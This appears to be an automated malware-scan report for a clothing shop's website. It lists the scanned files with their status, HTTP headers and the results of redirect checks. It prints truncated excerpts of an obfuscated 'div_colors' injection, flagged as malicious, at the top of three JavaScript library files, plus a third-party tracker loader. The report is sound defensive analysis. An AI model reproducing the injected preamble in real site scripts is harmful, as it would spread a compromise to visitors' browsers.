Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=meefah.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://meefah.com/ | 200 OK Content-Length: 9790 Content-Type: text/html | clean |
http://meefah.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://tracker.stats.in.th/tracker.php?uid=18554 | 200 OK Content-Length: 579 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: meefah.com. The match is the stats_domain value in the response body below, i.e. the scanned site's own domain. The script shown only sets tracker variables and writes a script tag for static.stats.in.th/tracker.js, and that file is not among the scanned files in this listing.
var stats_key="3400781915";
var stats_domain='meefah.com';
var stats_uid='18554';
var stats_uname='18554';
var use_ssl = 'https:' == document.location.protocol;
if(typeof(parent.document) != 'undefined') {
  if(typeof(parent.stats_init) == 'undefined') {
    parent.stats_init = true;
    document.write("<script src='" + document.location.protocol + "//static.stats.in.th/tracker.js'></script>");
  }
} else if(typeof(stats_init) == 'undefined') {
  var stats_init = true;
  document.write("<script src='" + document.location.protocol + "//static.stats.in.th/tracker.js'></script>");
}
| ||
http://meefah.com/index.html | 200 OK Content-Length: 9790 Content-Type: text/html | clean |
http://meefah.com/cloth.php | 200 OK Content-Length: 10140 Content-Type: text/html | clean |
http://meefah.com/poloman.php | 200 OK Content-Length: 14089 Content-Type: text/html | clean |
http://meefah.com/js/prototype.js | 200 OK Content-Length: 48972 Content-Type: application/javascript | malicious |
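Malicious code - confirmed by antiviruses (see below). The excerpt appears to be truncated: the div_pick_colors loop is never closed before what looks like the library's own Position.cumulativeOffset code resumes. The same redef_colors / div_colors preamble also opens the excerpts for scriptaculous.js and lightbox.js further down, which suggests a single injection applied to several of the site's script files; comparing each file against a pristine copy of the library would show the full extent of the added code.
if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) { Position.cumulativeOffset = function(element) { var valueT = 0, valueL = 0; do { valueT += element.offsetTop || 0; valueL += element.offsetLeft || 0; if (element.offsetParent == document.body) if (Element.getStyle(element, 'position') == 'absolute') break; element = element.offsetParent; } while (element); return [valueL, valueT]; } }
Antivirus reports: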
| ||
http://meefah.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 3521 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt as shown by the scanner:
if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/)) }).each( function(s) { var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load();
Antivirus reports:
| ||
http://meefah.com/js/lightbox.js | 200 OK Content-Length: 24750 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt as shown by the scanner:
if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; } var flashEmbeds = document.getElementsByTagName("embeds"); for (i = 0; i != flashEmbeds.length; i++) { flashEmbeds[i].style.visibility = "hidden"; } } function pause(ms){ var date = new Date(); curDate = null; do{var curDate = new Date();} while( curDate - date < ms); } function initLightbox() { myLightbox = new Lightbox(); } Event.observe(window, 'load', initLightbox, false);
Antivirus reports:
| ||
http://meefah.com/polowomen.php | 200 OK Content-Length: 14206 Content-Type: text/html | clean |
http://meefah.com/flowerm.php | 200 OK Content-Length: 19346 Content-Type: text/html | clean |
http://meefah.com/flowerw.php | 200 OK Content-Length: 24082 Content-Type: text/html | clean |
http://meefah.com/v-neck.php | 200 OK Content-Length: 11474 Content-Type: text/html | clean |
http://meefah.com/bag.php | 200 OK Content-Length: 17635 Content-Type: text/html | clean |
http://meefah.com/bag/example/9x11_bag.jpg | 200 OK Content-Length: 24909 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: meefah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 21:35:16 GMT
Accept-Ranges: bytes
ETag: "da520-263e-4d717babcd600"
Server: Apache/2.2.16 (Debian) PHP/5.3.28-1~dotdeb.0 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
Vary: Accept-Encoding
Content-Length: 9790
Content-Type: text/html
Last-Modified: Mon, 04 Mar 2013 11:33:44 GMT
...9790 bytes of data.
GET / HTTP/1.1
Host: meefah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 21:35:16 GMT
Accept-Ranges: bytes
ETag: "da520-263e-4d717babcd600"
Server: Apache/2.2.16 (Debian) PHP/5.3.28-1~dotdeb.0 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
Vary: Accept-Encoding
Content-Length: 9790
Content-Type: text/html
Last-Modified: Mon, 04 Mar 2013 11:33:44 GMT
...9790 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: meefah.com
Referer: http://www.google.com/search?q=meefah.com
Result:
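The result is similar to the first query; no suspicious redirects were found. Only the Referer header was varied between the two queries, so a redirect conditioned on something else (for example User-Agent, cookies or client IP) would not show up in this check.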
GET / HTTP/1.1
Host: meefah.com
Referer: http://www.google.com/search?q=meefah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.